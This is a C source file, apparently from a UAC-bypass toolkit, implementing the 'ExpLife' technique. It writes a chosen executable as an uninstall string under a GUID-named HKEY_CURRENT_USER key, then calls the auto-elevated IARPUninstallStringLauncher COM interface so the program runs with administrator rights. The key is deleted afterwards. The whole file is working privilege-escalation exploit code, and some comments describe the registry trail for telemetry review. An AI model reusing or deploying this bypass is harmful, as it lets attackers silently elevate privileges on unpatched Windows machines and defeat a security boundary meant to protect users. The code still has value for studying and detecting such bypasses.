/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016 - 2019
*
* TITLE: EXPLIFE.C
*
* VERSION: 3.17
*
* DATE: 18 Mar 2019
*
* ExpLife UAC bypass using IARPUninstallStringLauncher.
* For description please visit original URL
* http://www.freebuf.com/articles/system/116611.html
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* ucmMasqueradedAPRLaunchFile
*
* Purpose:
*
* Request an IARPUninstallStringLauncher instance through
* ucmAllocateElevatedObject and invoke LaunchUninstallStringAndWait on it.
*
* lpszFileGuid is handed to the interface method unchanged; the caller in
* this file passes the GUID string it used as the registry subkey name.
*
* Returns TRUE when the last HRESULT obtained is a success code, FALSE
* otherwise. Note that a successful allocation that yields a NULL interface
* pointer is still reported as TRUE, because only the HRESULT is tested.
*
*/
BOOL ucmMasqueradedAPRLaunchFile(
    _In_ LPWSTR lpszFileGuid
)
{
    IARPUninstallStringLauncher *pLauncher = NULL;
    HRESULT hr;

    hr = ucmAllocateElevatedObject(
        T_CLSID_UninstallStringLauncher,
        &IID_IARPUninstallStringLauncher,
        CLSCTX_LOCAL_SERVER,
        &pLauncher);

    /* Nothing to call or release unless both the HRESULT and the pointer are good. */
    if (FAILED(hr) || pLauncher == NULL)
        return SUCCEEDED(hr);

    /* NOTE(review): the meaning of the 0 / FALSE / NULL arguments is not
       visible in this file; the interface is declared elsewhere. */
    hr = pLauncher->lpVtbl->LaunchUninstallStringAndWait(
        pLauncher,
        0,
        lpszFileGuid,
        FALSE,
        NULL);

    /* Drop the reference obtained from the allocation above. */
    pLauncher->lpVtbl->Release(pLauncher);

    return SUCCEEDED(hr);
}
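/*
* ucmUninstallLauncherMethod
*
* Purpose:
*
* Bypass UAC using AutoElevated undocumented IARPUninstallStringLauncher interface.
*
* Fixed in Windows 10 RS3
*
* lpszExecutable is the string written as the T_UNINSTALL_STRING value.
*
* Returns STATUS_SUCCESS when ucmMasqueradedAPRLaunchFile reports success,
* STATUS_ACCESS_DENIED in every other case.
*
* Observable sequence, useful when reviewing telemetry: a GUID-named subkey
* is created below the T_UNINSTALL path in HKEY_CURRENT_USER, a
* T_UNINSTALL_STRING value (REG_SZ) is written to it, the COM launcher is
* invoked with that GUID, and the subkey is deleted again before returning.
*
*/
NTSTATUS ucmUninstallLauncherMethod(
    _In_ LPWSTR lpszExecutable
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    HRESULT hr_init;
    SIZE_T cbData;
    HKEY hKey = NULL;
    GUID guid;
    WCHAR szKeyName[MAX_PATH], szGuid[64];

    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);

    if (CoCreateGuid(&guid) != S_OK)
        goto Cleanup;

    /* Key name = T_UNINSTALL prefix followed by the textual GUID. */
    _strcpy(szKeyName, T_UNINSTALL);
    if (!StringFromGUID2(&guid, szGuid, sizeof(szGuid) / sizeof(WCHAR)))
        goto Cleanup;

    _strcat(szKeyName, szGuid);

    if (ERROR_SUCCESS != RegCreateKeyEx(
        HKEY_CURRENT_USER,
        szKeyName,
        0,
        NULL,
        REG_OPTION_NON_VOLATILE,
        MAXIMUM_ALLOWED,
        NULL,
        &hKey,
        NULL))
    {
        goto Cleanup;
    }

    /* Size in bytes, including the terminating null character. */
    cbData = (1 + _strlen(lpszExecutable)) * sizeof(WCHAR);

    if (ERROR_SUCCESS == RegSetValueEx(
        hKey,
        T_UNINSTALL_STRING,
        0,
        REG_SZ,
        (BYTE*)lpszExecutable,
        (DWORD)cbData))
    {
        if (ucmMasqueradedAPRLaunchFile(szGuid))
            MethodResult = STATUS_SUCCESS;
    }

    /* The key is removed whether or not the value write or launch succeeded;
       the result of RegDeleteKey is not checked (best effort). */
    RegCloseKey(hKey);
    RegDeleteKey(HKEY_CURRENT_USER, szKeyName);

Cleanup:
    /* Every successful CoInitializeEx call, including one that returns
       S_FALSE, has to be balanced by CoUninitialize; testing for S_OK only
       left the S_FALSE case unbalanced. */
    if (SUCCEEDED(hr_init))
        CoUninitialize();

    return MethodResult;
}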